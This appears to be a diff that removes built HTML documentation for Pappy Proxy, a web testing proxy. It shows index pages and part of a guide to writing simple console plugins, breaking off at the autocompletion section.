<dt><a href="pappyproxy.html#pappyproxy.http.HTTPMessage.to_json">to_json() (pappyproxy.http.HTTPMessage method)</a>
</dt>
</dl></td>
</tr></table>
<h2 id="U">U</h2>
<table style="width: 100%" class="indextable genindextable"><tr>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.url">url (pappyproxy.http.Request attribute)</a>
</dt>
</dl></td>
<td style="width: 33%" valign="top"><dl>
<dt><a href="pappyproxy.html#pappyproxy.http.Request.url_color">url_color (pappyproxy.http.Request attribute)</a>
</dt>
</dl></td>
</tr></table>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<div id="searchbox" style="display: none" role="search">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="#" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

180
docs/build/html/index.html vendored
Unescape View File

@ -1,180 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Welcome to Pappy Proxy’s documentation! &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="#" />
<link rel="next" title="The Pappy Proxy" href="overview.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
accesskey="N">next</a> |</li>
<li class="nav-item nav-item-0"><a href="#">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<div class="section" id="welcome-to-pappy-proxy-s-documentation">
<h1>Welcome to Pappy Proxy&#8217;s documentation!<a class="headerlink" href="#welcome-to-pappy-proxy-s-documentation" title="Permalink to this headline"></a></h1>
<p>Contents:</p>
<div class="toctree-wrapper compound">
<ul>
<li class="toctree-l1"><a class="reference internal" href="overview.html">The Pappy Proxy</a><ul>
<li class="toctree-l2"><a class="reference internal" href="overview.html#introduction">Introduction</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#contributing">Contributing</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="overview.html#how-to-use-it">How to Use It</a><ul>
<li class="toctree-l2"><a class="reference internal" href="overview.html#installation">Installation</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#quickstart">Quickstart</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#lite-mode">Lite Mode</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#adding-the-ca-cert-to-your-browser">Adding The CA Cert to Your Browser</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#configuration">Configuration</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#general-console-techniques">General Console Techniques</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#generating-pappy-s-ca-cert">Generating Pappy&#8217;s CA Cert</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#browsing-recorded-requests-responses">Browsing Recorded Requests/Responses</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#tags">Tags</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#request-ids">Request IDs</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#context">Context</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#filter-strings">Filter Strings</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#scope">Scope</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#decoding-strings">Decoding Strings</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#interceptor">Interceptor</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#repeater">Repeater</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#macros">Macros</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#intercepting-macros">Intercepting Macros</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#logging">Logging</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#additional-commands-and-features">Additional Commands and Features</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#plugins">Plugins</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#global-settings">Global Settings</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#using-a-socks-server">Using a SOCKS Server</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#transparent-host-redirection">Transparent Host Redirection</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#faq">FAQ</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#boring-technical-stuff">Boring, Technical Stuff</a></li>
<li class="toctree-l2"><a class="reference internal" href="overview.html#changelog">Changelog</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="tutorial.html">The Pappy Proxy Tutorial</a><ul>
<li class="toctree-l2"><a class="reference internal" href="tutorial.html#getting-set-up">Getting Set Up</a></li>
<li class="toctree-l2"><a class="reference internal" href="tutorial.html#the-tutorial">The Tutorial</a></li>
<li class="toctree-l2"><a class="reference internal" href="tutorial.html#conclusion">Conclusion</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="pappyplugins.html">Writing Plugins for the Pappy Proxy</a><ul>
<li class="toctree-l2"><a class="reference internal" href="pappyplugins.html#introduction">Introduction</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyplugins.html#creating-a-plugin">Creating a Plugin</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyplugins.html#plugin-api">Plugin API</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyplugins.html#built-in-plugins-as-examples">Built In Plugins As Examples</a></li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="contributing.html">Contributing</a><ul>
<li class="toctree-l2"><a class="reference internal" href="contributing.html#id1">Contributing</a></li>
<li class="toctree-l2"><a class="reference internal" href="contributing.html#feature-wishlist">Feature Wishlist</a></li>
</ul>
</li>
</ul>
</div>
</div>
<div class="section" id="indices-and-tables">
<h1>Indices and tables<a class="headerlink" href="#indices-and-tables" title="Permalink to this headline"></a></h1>
<ul class="simple">
<li><a class="reference internal" href="genindex.html"><span>Index</span></a></li>
<li><a class="reference internal" href="py-modindex.html"><span>Module Index</span></a></li>
<li><a class="reference internal" href="search.html"><span>Search Page</span></a></li>
</ul>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<h3><a href="#">Table Of Contents</a></h3>
<ul>
<li><a class="reference internal" href="#">Welcome to Pappy Proxy&#8217;s documentation!</a></li>
<li><a class="reference internal" href="#indices-and-tables">Indices and tables</a></li>
</ul>
<h4>Next topic</h4>
<p class="topless"><a href="overview.html"
title="next chapter">The Pappy Proxy</a></p>
<div role="note" aria-label="source link">
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="_sources/index.txt"
rel="nofollow">Show Source</a></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="overview.html" title="The Pappy Proxy"
>next</a> |</li>
<li class="nav-item nav-item-0"><a href="#">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

123
docs/build/html/modules.html vendored
Unescape View File

@ -1,123 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>pappyproxy &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<div class="section" id="pappyproxy">
<h1>pappyproxy<a class="headerlink" href="#pappyproxy" title="Permalink to this headline"></a></h1>
<div class="toctree-wrapper compound">
<ul>
<li class="toctree-l1"><a class="reference internal" href="pappyproxy.html">pappyproxy package</a><ul>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#subpackages">Subpackages</a><ul class="simple">
</ul>
</li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#submodules">Submodules</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.comm">pappyproxy.comm module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.config">pappyproxy.config module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.console">pappyproxy.console module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.context">pappyproxy.context module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.http">pappyproxy.http module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.iter">pappyproxy.iter module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.macros">pappyproxy.macros module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.pappy">pappyproxy.pappy module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.plugin">pappyproxy.plugin module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.proxy">pappyproxy.proxy module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.repeater">pappyproxy.repeater module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.session">pappyproxy.session module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy.util">pappyproxy.util module</a></li>
<li class="toctree-l2"><a class="reference internal" href="pappyproxy.html#module-pappyproxy">Module contents</a></li>
</ul>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar" role="navigation" aria-label="main navigation">
<div class="sphinxsidebarwrapper">
<div role="note" aria-label="source link">
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="_sources/modules.txt"
rel="nofollow">Show Source</a></li>
</ul>
</div>
<div id="searchbox" style="display: none" role="search">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="footer" role="contentinfo">
&copy; Copyright 2015, Rob Glew.
Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.3.6.
</div>
</body>
</html>

BIN
docs/build/html/objects.inv vendored
View File

Binary file not shown.

2326
docs/build/html/overview.html vendored
View File

File diff suppressed because it is too large Load Diff

631
docs/build/html/pappyplugins.html vendored
Unescape View File

@ -1,631 +0,0 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Writing Plugins for the Pappy Proxy &mdash; Pappy Proxy 0.2.11 documentation</title>
<link rel="stylesheet" href="_static/classic.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: './',
VERSION: '0.2.11',
COLLAPSE_INDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/underscore.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="Pappy Proxy 0.2.11 documentation" href="index.html" />
<link rel="next" title="Contributing" href="contributing.html" />
<link rel="prev" title="The Pappy Proxy Tutorial" href="tutorial.html" />
</head>
<body role="document">
<div class="related" role="navigation" aria-label="related navigation">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="py-modindex.html" title="Python Module Index"
>modules</a> |</li>
<li class="right" >
<a href="contributing.html" title="Contributing"
accesskey="N">next</a> |</li>
<li class="right" >
<a href="tutorial.html" title="The Pappy Proxy Tutorial"
accesskey="P">previous</a> |</li>
<li class="nav-item nav-item-0"><a href="index.html">Pappy Proxy 0.2.11 documentation</a> &raquo;</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body" role="main">
<div class="section" id="writing-plugins-for-the-pappy-proxy">
<h1>Writing Plugins for the Pappy Proxy<a class="headerlink" href="#writing-plugins-for-the-pappy-proxy" title="Permalink to this headline"></a></h1>
<div class="contents local topic" id="table-of-contents">
<p class="topic-title first">Table of Contents</p>
<ul class="simple">
<li><a class="reference internal" href="#introduction" id="id1">Introduction</a><ul>
<li><a class="reference internal" href="#should-i-write-a-plugin-or-a-macro" id="id2">Should I Write a Plugin or a Macro?</a></li>
<li><a class="reference internal" href="#plugins-get-merged" id="id3">Plugins Get Merged</a></li>
</ul>
</li>
<li><a class="reference internal" href="#creating-a-plugin" id="id4">Creating a Plugin</a><ul>
<li><a class="reference internal" href="#writing-a-hello-world-plugin" id="id5">Writing a Hello World Plugin</a></li>
<li><a class="reference internal" href="#passing-arguments-to-your-function" id="id6">Passing Arguments to Your Function</a></li>
<li><a class="reference internal" href="#adding-more-aliases" id="id7">Adding More Aliases</a></li>
<li><a class="reference internal" href="#adding-another-command" id="id8">Adding Another Command</a></li>
<li><a class="reference internal" href="#adding-autocompletion" id="id9">Adding Autocompletion</a></li>
<li><a class="reference internal" href="#adding-help" id="id10">Adding Help</a></li>
<li><a class="reference internal" href="#using-defer-inlinecallbacks-with-a-command" id="id11">Using defer.inlineCallbacks With a Command</a></li>
</ul>
</li>
<li><a class="reference internal" href="#plugin-api" id="id12">Plugin API</a><ul>
<li><a class="reference internal" href="#api-functions" id="id13">API Functions</a></li>
<li><a class="reference internal" href="#storing-data-on-disk" id="id14">Storing Data on Disk</a></li>
<li><a class="reference internal" href="#storing-custom-request-metadata" id="id15">Storing Custom Request Metadata</a></li>
<li><a class="reference internal" href="#useful-functions" id="id16">Useful Functions</a></li>
</ul>
</li>
<li><a class="reference internal" href="#built-in-plugins-as-examples" id="id17">Built In Plugins As Examples</a><ul>
<li><a class="reference internal" href="#built-in-plugins" id="id18">Built In Plugins</a></li>
<li><a class="reference internal" href="#interceptor-and-repeater" id="id19">Interceptor and Repeater</a></li>
</ul>
</li>
</ul>
</div>
<div class="section" id="introduction">
<h2><a class="toc-backref" href="#id1">Introduction</a><a class="headerlink" href="#introduction" title="Permalink to this headline"></a></h2>
<p>Are macros not powerful enough? Want to make something reusable? Want to add console commands?! Then you might want to write yourself a plugin. Some quick highlights about plugins:</p>
<ul class="simple">
<li>Python scripts stored in <code class="docutils literal"><span class="pre">~/.pappy/plugins</span></code></li>
<li>Can add console commands</li>
<li>For actions which aren&#8217;t specific to one project</li>
<li>Harder to write than macros</li>
</ul>
<p>Since macros can also use the plugin API, plugins aren&#8217;t any more powerful than macros (besides adding console commands). However, if you find yourself copying a useful macro to more than one project, it may be worth it to just bind it to some commands, put the script in one place, and stop worrying about copying it around. Plus then you can put it on GitHub for some sweet sweet nerd cred.</p>
<div class="section" id="should-i-write-a-plugin-or-a-macro">
<h3><a class="toc-backref" href="#id2">Should I Write a Plugin or a Macro?</a><a class="headerlink" href="#should-i-write-a-plugin-or-a-macro" title="Permalink to this headline"></a></h3>
<p>A lot of the time, you can get away with writing a macro. However, you may consider writing a plugin if:</p>
<ul class="simple">
<li>You find yourself copying one macro to multiple projects</li>
<li>You want to write a general tool that can be applied to any website</li>
<li>You need to maintain state during the Pappy session</li>
</ul>
<p>My guess is that if you need one quick thing for a project, you&#8217;re better off writing a macro first and seeing if you end up using it in future projects. Then if you find yourself needing it a lot, write a plugin for it. You may also consider keeping a <code class="docutils literal"><span class="pre">mine.py</span></code> plugin where you can write out commands that you use regularly but may not be worth creating a dedicated plugin for.</p>
</div>
<div class="section" id="plugins-get-merged">
<h3><a class="toc-backref" href="#id3">Plugins Get Merged</a><a class="headerlink" href="#plugins-get-merged" title="Permalink to this headline"></a></h3>
<p>If you write a useful plugin, as long as it isn&#8217;t uber niche, I&#8217;ll try and merge it into the core project.</p>
</div>
</div>
<div class="section" id="creating-a-plugin">
<h2><a class="toc-backref" href="#id4">Creating a Plugin</a><a class="headerlink" href="#creating-a-plugin" title="Permalink to this headline"></a></h2>
<p>Whenever you make a macro, you&#8217;ll have to bind some functions to some console commands. To do this, you&#8217;ll have to define a <code class="docutils literal"><span class="pre">load_cmds</span></code> function in your plugin. This function should take one argument. When the plugin is loaded, this function will be called and the console object will be passed to this function. You can then use <code class="docutils literal"><span class="pre">set_cmds</span></code> and <code class="docutils literal"><span class="pre">add_aliases</span></code> to bind functions to console commands.</p>
<div class="section" id="writing-a-hello-world-plugin">
<h3><a class="toc-backref" href="#id5">Writing a Hello World Plugin</a><a class="headerlink" href="#writing-a-hello-world-plugin" title="Permalink to this headline"></a></h3>
<p>It&#8217;s probably easiest to explain how to write a plugin by writing one. Here is a simple plugin that defines a <code class="docutils literal"><span class="pre">hello</span></code> command and gives an alias <code class="docutils literal"><span class="pre">hlo</span></code> (we&#8217;ll go over all the parts in a second):</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Save this as <code class="docutils literal"><span class="pre">~/.pappy/plugins/hello.py</span></code> and run Pappy. You should have a new <code class="docutils literal"><span class="pre">hello</span></code> command that prints your message:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ cp hello.py ~/.pappy/plugins/
$ pappy -l
Temporary datafile is /tmp/tmp1Myw6q
Proxy is listening on port 8000
pappy&gt; hello
Hello, world!
pappy&gt; hlo
Hello, world!
pappy&gt;
</pre></div>
</div>
<p>Awesome! So let&#8217;s go over the code. Here are the important parts of the code:</p>
<ul class="simple">
<li>We define a function that we want to call</li>
<li>We define <code class="docutils literal"><span class="pre">load_cmds(cmd)</span></code> to be called when our plugin is loaded to bind our function to a command</li>
<li>We use <code class="docutils literal"><span class="pre">cmd.set_cmds</span></code> to set all our commands</li>
<li>We use <code class="docutils literal"><span class="pre">cmd.add_aliases</span></code> to add aliases for commands</li>
</ul>
<p>Now let&#8217;s go over it in detail</p>
</div>
<div class="section" id="passing-arguments-to-your-function">
<h3><a class="toc-backref" href="#id6">Passing Arguments to Your Function</a><a class="headerlink" href="#passing-arguments-to-your-function" title="Permalink to this headline"></a></h3>
<p>Each command gets bound to one function which takes one argument. That argument is all the text that was entered after the name of the command in the console. For example if we run <code class="docutils literal"><span class="pre">hello</span> <span class="pre">foo</span> <span class="pre">bar</span></code>, in our function line would be &#8220;foo bar&#8221;. <strong>I suggest using shlex.split(line) to parse multiple arguments</strong>. So let&#8217;s update our script to take some arguments:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<p>Save your changes and restart pappy to reload the plugin:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy&gt; hello
Hello, world!
pappy&gt; hello foo bar baz
Hello, foo, bar, baz!
pappy&gt; hello foo bar &quot;baz lihtyur&quot;
Hello, foo, bar, baz lihtyur!
pappy&gt;
</pre></div>
</div>
</div>
<div class="section" id="adding-more-aliases">
<h3><a class="toc-backref" href="#id7">Adding More Aliases</a><a class="headerlink" href="#adding-more-aliases" title="Permalink to this headline"></a></h3>
<p>So now let&#8217;s add some more aliases to our command. If we want to add a new alias, we just add another tuple to the list passed into <code class="docutils literal"><span class="pre">cmd.add_aliases</span></code>. The first element is the real name of the command (what you set with <code class="docutils literal"><span class="pre">set_cmds</span></code>) and the second value is the alias you want to type. So let&#8217;s make it so we can just type <code class="docutils literal"><span class="pre">ho</span></code> to say hello:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span><span class="c1">## hello.py</span>
<span class="kn">import</span> <span class="nn">shlex</span>
<span class="k">def</span> <span class="nf">hello_world</span><span class="p">(</span><span class="n">line</span><span class="p">):</span>
<span class="k">if</span> <span class="n">line</span><span class="p">:</span>
<span class="n">args</span> <span class="o">=</span> <span class="n">shlex</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">print</span> <span class="s1">&#39;Hello, </span><span class="si">%s</span><span class="s1">!&#39;</span> <span class="o">%</span> <span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">args</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s2">&quot;Hello, world!&quot;</span>
<span class="c1">###############</span>
<span class="c1">## Plugin hooks</span>
<span class="k">def</span> <span class="nf">load_cmds</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">set_cmds</span><span class="p">({</span>
<span class="s1">&#39;hello&#39;</span><span class="p">:</span> <span class="p">(</span><span class="n">hello_world</span><span class="p">,</span> <span class="bp">None</span><span class="p">),</span>
<span class="p">})</span>
<span class="n">cmd</span><span class="o">.</span><span class="n">add_aliases</span><span class="p">([</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;hlo&#39;</span><span class="p">),</span>
<span class="p">(</span><span class="s1">&#39;hello&#39;</span><span class="p">,</span> <span class="s1">&#39;ho&#39;</span><span class="p">),</span>
<span class="p">])</span>
</pre></div>
</div>
<div class="admonition note">
<p class="first admonition-title">Note</p>
<p class="last">You must use the actual name of the command that you used in <code class="docutils literal"><span class="pre">set_cmds</span></code>. You can&#8217;t &#8220;chain&#8221; alieases. As a result, in our example we couldn&#8217;t add the alias <code class="docutils literal"><span class="pre">('hlo',</span> <span class="pre">'ho')</span></code> to add <code class="docutils literal"><span class="pre">ho</span></code> as our alias.</p>
</div>
<p>Then reload the plugin:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpBOXyJ3
Proxy is listening on port 8000
pappy&gt; ho
Hello, world!
pappy&gt; ho foo bar baz
Hello, foo, bar, baz!
pappy&gt; ho foo bar &quot;baz lihtyur&quot;
Hello, foo, bar, baz lihtyur!
pappy&gt;
</pre></div>
</div>
</div>
<div class="section" id="adding-another-command">
<h3><a class="toc-backref" href="#id8">Adding Another Command</a><a class="headerlink" href="#adding-another-command" title="Permalink to this headline"></a></h3>
<p>So now let&#8217;s add a <code class="docutils literal"><span class="pre">robe_and_wizard_hat</span></code> command. To do this, we will define another function, then add another entry in the dict that is passed to <code class="docutils literal"><span class="pre">set_cmds</span></code>. The second value in the tuple is the autocomplete function, but we&#8217;ll get to that later. For now, just put in <code class="docutils literal"><span class="pre">None</span></code> to say we don&#8217;t have one. We will also add a <code class="docutils literal"><span class="pre">wh</span></code> alias to it:</p>
<div class="highlight-python"><div class="highlight"><pre><span></span>$ pappy -l
Temporary datafile is /tmp/tmpyl2cEZ
Proxy is listening on port 8000
pappy&gt; wh
I put on my robe and wizard hat
pappy&gt;
</pre></div>
</div>
</div>
<div class="section" id="adding-autocompletion">
<h3><a class="toc-backref" href="#id9">Adding Autocompletion</a><a class="headerlink" href="#adding-autocompletion" title="Permalink to this headline"></a></h3>
